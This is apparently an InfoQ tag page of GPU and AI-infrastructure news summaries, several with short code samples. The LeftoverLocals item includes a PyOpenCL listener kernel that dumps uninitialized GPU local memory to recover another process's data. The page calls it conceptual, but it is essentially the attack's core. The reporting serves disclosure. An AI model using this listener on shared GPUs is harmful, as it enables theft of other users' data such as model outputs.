GPU Content on InfoQ
-
Microsoft Launches Open-Source Phi-3.5 Models for Advanced AI Development
Microsoft launched three new open-source AI models in its Phi-3.5 series: Phi-3.5-mini-instruct, Phi-3.5-MoE-instruct, and Phi-3.5-vision-instruct. Available under a permissive MIT license, these models offer developers powerful tools for various tasks, including reasoning, multilingual processing, and image and video analysis.
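For developers who want to try the models, here is a minimal sketch of loading the mini variant with the Hugging Face transformers library; the microsoft/Phi-3.5-mini-instruct model ID comes from Microsoft's model cards, and the dtype and device settings are illustrative.

    # Minimal sketch: loading Phi-3.5-mini-instruct with Hugging Face
    # transformers. Model ID per Microsoft's model card; dtype/device
    # settings are illustrative and should match your hardware.
    import torch
    from transformers import AutoModelForCausalLM, AutoTokenizer

    model_id = "microsoft/Phi-3.5-mini-instruct"
    tokenizer = AutoTokenizer.from_pretrained(model_id)
    model = AutoModelForCausalLM.from_pretrained(
        model_id,
        torch_dtype=torch.bfloat16,
        device_map="auto",
    )

    messages = [{"role": "user",
                 "content": "Explain mixture-of-experts in one sentence."}]
    inputs = tokenizer.apply_chat_template(
        messages, add_generation_prompt=True, return_tensors="pt"
    ).to(model.device)
    outputs = model.generate(inputs, max_new_tokens=128)
    print(tokenizer.decode(outputs[0][inputs.shape[-1]:],
                           skip_special_tokens=True))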
-
Meta's Research SuperCluster for Real-Time Voice Translation AI Systems
A recent article from Engineering at Meta reveals how the company is building its Research SuperCluster (RSC) infrastructure, which underpins its work on real-time voice translation, language processing, computer vision, and augmented reality (AR).
-
NVIDIA Announces Next-Generation AI Superchip Blackwell
NVIDIA recently announced its next-generation GPU architecture, Blackwell. Blackwell is the largest GPU ever built, with over 200 billion transistors, and can train large language models (LLMs) up to 4x faster than previous-generation hardware.
-
Nvidia Announces Robotics-Oriented AI Foundational Model
At its recent GTC 2024 event, Nvidia announced a new foundational model to build intelligent humanoid robots. Dubbed GR00T, short for Generalist Robot 00 Technology, the model will understand natural language and be able to observe human actions and emulate human movements.
-
Meta Unveils 24k GPU AI Infrastructure Design
Meta recently announced the design of two new AI computing clusters, each containing 24,576 GPUs. The clusters are based on Meta's Grand Teton hardware platform, and one of them is currently used by Meta to train its next-generation Llama 3 model.
-
NVIDIA Introduces Metropolis Microservices for Jetson to Run AI Apps at the Edge
NVIDIA has expanded its cloud-based Metropolis Microservices AI solution to run on the NVIDIA Jetson embedded IoT platform, including support for video streaming and AI-based perception.
-
LeftoverLocals May Leak LLM Responses on Apple, Qualcomm, and AMD GPUs
Security firm Trail of Bits disclosed a vulnerability allowing malicious actors to recover data from GPU local memory on Apple, Qualcomm, AMD, and Imagination GPUs. Dubbed LeftoverLocals, the vulnerability affects any application using the GPU, including Large Language Models (LLMs) and machine learning (ML) models.
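Conceptually, the attack launches a "listener" kernel that dumps uninitialized GPU local memory, which on affected hardware may still contain data left behind by another process's kernel. The PyOpenCL sketch below illustrates the idea only, loosely modeled on Trail of Bits' description; it is not a working exploit, and the local-memory size is an assumption.

    # Conceptual sketch only, not a working exploit: a "listener" kernel
    # copies *uninitialized* GPU local memory to a global buffer. On GPUs
    # vulnerable to LeftoverLocals, those words may hold data left behind
    # by another kernel. Requires pyopencl and an OpenCL-capable GPU.
    import numpy as np
    import pyopencl as cl

    LOCAL_WORDS = 1024  # assumed amount of local memory to dump

    kernel_src = """
    __kernel void listener(__global uint *out) {
        __local uint lm[%(n)d];
        // Read local memory without ever writing it first.
        for (uint i = get_local_id(0); i < %(n)d; i += get_local_size(0))
            out[i] = lm[i];
    }
    """ % {"n": LOCAL_WORDS}

    ctx = cl.create_some_context()
    queue = cl.CommandQueue(ctx)
    prog = cl.Program(ctx, kernel_src).build()
    out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, LOCAL_WORDS * 4)

    prog.listener(queue, (256,), (256,), out_buf)
    dump = np.empty(LOCAL_WORDS, dtype=np.uint32)
    cl.enqueue_copy(queue, dump, out_buf)
    print("nonzero leftover words:", int(np.count_nonzero(dump)))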
-
AWS Unveils Gemini, a Distributed Training System for Swift Failure Recovery in Large Model Training
AWS and Rice University have introduced Gemini, a distributed training system that redefines failure recovery for large-scale deep learning models. According to the research paper, Gemini checkpoints training state to CPU memory, which allows much faster failure recovery than writing checkpoints to remote storage, while working around the high recovery cost and limited checkpoint storage bandwidth that constrain prior approaches.
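As an illustration of the core idea only (not Gemini's actual implementation), the PyTorch sketch below snapshots training state into host CPU memory so that recovery avoids a slow read from remote checkpoint storage.

    # Illustration of the core idea only, not Gemini's implementation:
    # keep a checkpoint in host CPU memory so recovery does not have to
    # pull state back over the network from remote storage.
    import torch

    def to_cpu(obj):
        """Recursively clone tensors in a state dict to CPU RAM."""
        if torch.is_tensor(obj):
            return obj.detach().to("cpu", copy=True)
        if isinstance(obj, dict):
            return {k: to_cpu(v) for k, v in obj.items()}
        if isinstance(obj, list):
            return [to_cpu(v) for v in obj]
        return obj

    device = "cuda" if torch.cuda.is_available() else "cpu"
    model = torch.nn.Linear(1024, 1024).to(device)
    opt = torch.optim.AdamW(model.parameters())

    # Taken every N steps; lives in CPU memory, so writing it is fast.
    snapshot = {"model": to_cpu(model.state_dict()),
                "optimizer": to_cpu(opt.state_dict())}

    # On failure, restore from the in-memory snapshot instead of storage.
    model.load_state_dict(snapshot["model"])
    opt.load_state_dict(snapshot["optimizer"])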
-
Microsoft Releases DeepSpeed-FastGen for High-Throughput Text Generation
Microsoft has announced the alpha release of DeepSpeed-FastGen, a system designed to improve the deployment and serving of large language models (LLMs). DeepSpeed-FastGen composes DeepSpeed-MII and DeepSpeed-Inference, and is built on the Dynamic SplitFuse technique, which splits long prompts into smaller chunks and schedules them together with ongoing token generation to keep GPU utilization consistently high. The system currently supports several model architectures.
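Per the announcement, FastGen is exposed through DeepSpeed-MII's pipeline API; the sketch below follows that API, though exact arguments may vary across MII releases.

    # Sketch per the DeepSpeed-FastGen announcement: serve a supported
    # model through DeepSpeed-MII's pipeline API. Exact arguments may
    # differ between MII releases; requires deepspeed-mii and a CUDA GPU.
    import mii

    pipe = mii.pipeline("mistralai/Mistral-7B-v0.1")
    responses = pipe(["DeepSpeed is", "Seattle is"], max_new_tokens=64)
    for r in responses:
        print(r.generated_text)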
-
Python-Like Numerical Computation Library MatX Brings Transforms as Operators and Other Features
Developed by NVIDIA for its own GPUs, MatX is a C++ library that aims to deliver near-native performance for numerical computing through a high-level syntax close to that of Python's SciPy or MATLAB. Its latest release brings a number of new features, including the ability to use transforms as operators and new operators such as upsample, downsample, and pwelch.
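To give a sense of what the new pwelch operator computes, here is the SciPy analogue that MatX's high-level syntax mirrors; MatX runs the equivalent computation on the GPU from C++.

    # SciPy analogue of what MatX's new pwelch operator computes: a Welch
    # power spectral density estimate. MatX expresses the equivalent GPU
    # computation from C++ with similarly compact, high-level syntax.
    import numpy as np
    from scipy import signal

    fs = 1e3                                   # sample rate in Hz
    t = np.arange(0, 1, 1 / fs)
    x = np.sin(2 * np.pi * 100 * t) + 0.5 * np.random.randn(t.size)

    f, pxx = signal.welch(x, fs=fs, nperseg=256)
    print("peak frequency:", f[np.argmax(pxx)])  # close to 100 Hz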
-
Google Cloud Ops Agent Can Now Monitor Nvidia GPUs
Google Cloud announced that Ops Agent, the agent for collecting telemetry from Compute Engine instances, can now collect and aggregate metrics from NVIDIA GPUs on VMs.
-
Azure Previews ND H100 V5 Virtual Machines to Accelerate Generative AI
Azure recently announced the preview of ND H100 v5 virtual machines, which integrate the latest NVIDIA H100 Tensor Core GPUs and support NVIDIA Quantum-2 InfiniBand networking. According to Microsoft, the new option will offer AI developers improved performance and scaling across thousands of GPUs.
-
AWS and NVIDIA to Collaborate on Next-Gen EC2 P5 Instances for Accelerating Generative AI
AWS and NVIDIA announced the development of a highly scalable, on-demand AI infrastructure that is specifically designed for training large language models and creating advanced generative AI applications. The collaboration aims to create the most optimized and efficient system of its kind, capable of meeting the demands of increasingly complex AI tasks.
-
NVIDIA Kubernetes Device Plug-in Brings Temporal GPU Concurrency
Since the v12 release, the NVIDIA GPU device plug-in for Kubernetes supports time-sliced sharing between CUDA workloads. This feature aims to prevent under-utilization of GPUs and makes it easier to scale applications by leveraging concurrently executing CUDA contexts.
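Time-slicing is enabled through the plug-in's configuration file, delivered as a ConfigMap; the sketch below follows the documented v1 config format, with an illustrative replica count.

    # Sketch of the device plug-in's time-slicing configuration, following
    # the documented v1 format; the replica count of 4 is illustrative and
    # advertises each physical GPU as four nvidia.com/gpu resources.
    apiVersion: v1
    kind: ConfigMap
    metadata:
      name: nvidia-device-plugin-config
    data:
      config.yaml: |
        version: v1
        sharing:
          timeSlicing:
            resources:
            - name: nvidia.com/gpu
              replicas: 4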
-
Asahi Linux Gets Alpha GPU Drivers on Apple Silicon
After two years of work to reverse-engineer the Apple Silicon GPU instruction set and implement a kernel driver, Asahi Linux has released an alpha-quality GPU driver that is already good enough to provide a smooth desktop experience and run some games, according to Asahi developers Alyssa Rosenzweig and Asahi Lina.